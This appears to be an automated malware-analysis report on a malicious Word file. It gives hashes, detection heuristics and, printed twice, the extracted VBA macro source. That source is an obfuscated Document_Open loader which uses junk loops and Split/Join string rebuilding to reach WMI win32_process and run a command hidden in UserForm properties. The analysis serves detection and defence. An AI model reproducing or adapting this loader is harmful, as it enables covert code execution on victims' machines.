Office (OLE) / .DOC malware analysis — malicious · ee2152b12fec0e82

MALICIOUS

Office (OLE) / .DOC

175.5 KB Created: 2020-08-22 01:33:00 Authoring application: Microsoft Office Word First seen: 2026-06-07

MD5: 208ebb237ad43587fcea96f335800664 SHA-1: d67e8ab61c5218fba5fff096d7070782c5fd5080 SHA-256: ee2152b12fec0e82dac380dbd350d8c815a9f73fa14a51e4ab9ff5ac0c32c8a3

230 Risk Score

Heuristics 7

ClamAV: Doc.Malware.Generic-9443669-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-9443669-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
U55bv2p2byg5ur5t = Split _
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Bodcpktztlnhkyp = CreateObject(P5udhddwbvc_o9)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10254 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10254 bytes
SHA-256: `2a4cecedd9af459335bb1e39f3bcb94644dc0c69cdab58669ffc8245227bc424`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Vf0xz5mzc572arwp" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Ar0b15zn5_jh.Jxvjudgqqm4 End Sub Attribute VB_Name = "Ar0b15zn5_jh" Attribute VB_Base = "0{3E7DD343-19AA-42DD-A06D-330B3F9B4400}{9BF01AB6-D092-43DE-BBE0-0CEFA8F216F4}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Jxvjudgqqm4() nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Wh2mhnxnldyde5 = Ar0b15zn5_jh.BorderStyle + 100 nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 F4cw9hxi3n3pqbu3j3 = ChrW(Wh2mhnxnldyde5 + (15)) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Flbssl2m0kra = "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]i15df qhs1g 2[s55da znb183b]nm15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]gm15df qhs1g 2[s55da znb183b]t15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]" + F4cw9hxi3n3pqbu3j3 + "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]:15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]in15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]315df qhs1g 2[s55da znb183b]215df qhs1g 2[s55da znb183b]_15df qhs1g 2[s55da znb183b]" + Ar0b15zn5_jh.T8emzofdn4z1e_xsa + "15df qhs1g 2[s55da znb183b]ro15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]ce15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]" nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 P5udhddwbvc_o9 = B2r_w0kzcx9xi48t(Flbssl2m0kra) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Set Bodcpktztlnhkyp = CreateObject(P5udhddwbvc_o9) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Wtj0ck4dihwvgmi = Ar0b15zn5_jh.E7dcs1rytjtf.ControlTipText nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Z5jo5oa196x240uu = Q_74vbobkti + (P5udhddwbvc_o9 + F4cw9hxi3n3pqbu3j3 + Ar0b15zn5_jh.Jhw3_x_g9q4__aw6k.ControlTipText + Wtj0ck4dihwvgmi) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Gtz8wbi0ptsiitu = Z5jo5oa196x240uu + Ar0b15zn5_jh.T8emzofdn4z1e_xsa nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Set Yb05a0j_tnl0v2p = Xzo40jkrppomiws6(Gtz8wbi0ptsiitu) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 X0vlcub9s8q64lo = Array(Lp37y9ianry + "Uw2h2qieiw0b Xw1tbajylw73m00O0v88e8fidmdj55q H3ltrmrors_7qosj", Bodcpktztlnhkyp.Create(Scp6tfclrri8kz, Ryoe131ul9ygpr, Yb05a0j_tnl0v2p), Lbchxgcxdtpx8k416 + "Vfgcvu_w_go4ibaiq Ikxiwbkwkf5jti Jvmvnqthbh8iklowy Jouhwtf3_k531xg_7") nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 End Function Function Xzo40jkrppomiws6(O008r0ne3q2_w7y) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Set Xzo40jkrppomiws6 = CreateObject(O008r0ne3q2_w7y) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Xzo40jkrppomiws6.showwindow = Rxd04cvaz4al8t + Lf5jf04qvrin nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 End Function Function B2r_w0kzcx9xi48t(Z41n90ajxmoau) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Kzx7s3vfne6z2kd = Trim(Conversion.CVar((Z41n90ajxmoau))) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 U55bv2p2byg5ur5t = Split _ (Kzx7s3vfne6z2kd, "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]") nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Vjuubrxz0odyouba = Njbkp89a2qwrw + Join(U55bv2p2byg5ur5t, Vm3yolwksn21s7h) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 B2r_w0kzcx9xi48t = Vjuubrxz0odyouba nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 End Function Function Scp6tfclrri8kz() nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Hbrd7b9mje6jtmu = Ar0b15zn5_jh.Pl19_xhd7r3.Tag nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 Scp6tfclrri8kz = B2r_w0kzcx9xi48t(Hbrd7b9mje6jtmu) nxuEDsvY52 = 7463 For XoqGaHJZ13 = 0 To 67 nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13 DoEvents Next XoqGaHJZ13 KglkgMVZ68 = 9198 For kZnkwmeI74 = 0 To 24 KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74 DoEvents Next kZnkwmeI74 jhlqPACC78 = 6797 For oAQhdOsV22 = 0 To 44 jhlqPACC78 = jhlqPACC78 + oAQhdOsV22 DoEvents Next oAQhdOsV22 End Function

SHA-256: 2a4cecedd9af459335bb1e39f3bcb94644dc0c69cdab58669ffc8245227bc424

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Vf0xz5mzc572arwp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ar0b15zn5_jh.Jxvjudgqqm4
End Sub


Attribute VB_Name = "Ar0b15zn5_jh"
Attribute VB_Base = "0{3E7DD343-19AA-42DD-A06D-330B3F9B4400}{9BF01AB6-D092-43DE-BBE0-0CEFA8F216F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Jxvjudgqqm4()
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Wh2mhnxnldyde5 = Ar0b15zn5_jh.BorderStyle + 100
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
F4cw9hxi3n3pqbu3j3 = ChrW(Wh2mhnxnldyde5 + (15))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Flbssl2m0kra = "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]i15df qhs1g 2[s55da znb183b]nm15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]gm15df qhs1g 2[s55da znb183b]t15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]" + F4cw9hxi3n3pqbu3j3 + "15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]:15df qhs1g 2[s55da znb183b]w15df qhs1g 2[s55da znb183b]in15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]315df qhs1g 2[s55da znb183b]215df qhs1g 2[s55da znb183b]_15df qhs1g 2[s55da znb183b]" + Ar0b15zn5_jh.T8emzofdn4z1e_xsa + "15df qhs1g 2[s55da znb183b]ro15df qhs1g 2[s55da znb183b]15df qhs1g 2[s55da znb183b]ce15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]s15df qhs1g 2[s55da znb183b]"
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
P5udhddwbvc_o9 = B2r_w0kzcx9xi48t(Flbssl2m0kra)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set Bodcpktztlnhkyp = CreateObject(P5udhddwbvc_o9)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Wtj0ck4dihwvgmi = Ar0b15zn5_jh.E7dcs1rytjtf.ControlTipText
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Z5jo5oa196x240uu = Q_74vbobkti + (P5udhddwbvc_o9 + F4cw9hxi3n3pqbu3j3 + Ar0b15zn5_jh.Jhw3_x_g9q4__aw6k.ControlTipText + Wtj0ck4dihwvgmi)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Gtz8wbi0ptsiitu = Z5jo5oa196x240uu + Ar0b15zn5_jh.T8emzofdn4z1e_xsa
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set Yb05a0j_tnl0v2p = Xzo40jkrppomiws6(Gtz8wbi0ptsiitu)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
X0vlcub9s8q64lo = Array(Lp37y9ianry + "Uw2h2qieiw0b Xw1tbajylw73m00O0v88e8fidmdj55q H3ltrmrors_7qosj", Bodcpktztlnhkyp.Create(Scp6tfclrri8kz, Ryoe131ul9ygpr, Yb05a0j_tnl0v2p), Lbchxgcxdtpx8k416 + "Vfgcvu_w_go4ibaiq Ikxiwbkwkf5jti Jvmvnqthbh8iklowy Jouhwtf3_k531xg_7")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function Xzo40jkrppomiws6(O008r0ne3q2_w7y)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Set Xzo40jkrppomiws6 = CreateObject(O008r0ne3q2_w7y)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Xzo40jkrppomiws6.showwindow = Rxd04cvaz4al8t + Lf5jf04qvrin
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
End Function
Function B2r_w0kzcx9xi48t(Z41n90ajxmoau)
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
Kzx7s3vfne6z2kd = Trim(Conversion.CVar((Z41n90ajxmoau)))
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
U55bv2p2byg5ur5t = Split _
(Kzx7s3vfne6z2kd, "15d" + "f qhs" + "1g 2[s55" + "da znb" + "183b]")
   nxuEDsvY52 = 7463
For XoqGaHJZ13 = 0 To 67
nxuEDsvY52 = nxuEDsvY52 + XoqGaHJZ13
DoEvents
Next XoqGaHJZ13
KglkgMVZ68 = 9198
For kZnkwmeI74 = 0 To 24
KglkgMVZ68 = KglkgMVZ68 + kZnkwmeI74
DoEvents
Next kZnkwmeI74
jhlqPACC78 = 6797
For oAQhdOsV22 = 0 To 44
jhlqPACC78 = jhlqPACC78 + oAQhdOsV22
DoEvents
Next oAQhdOsV22
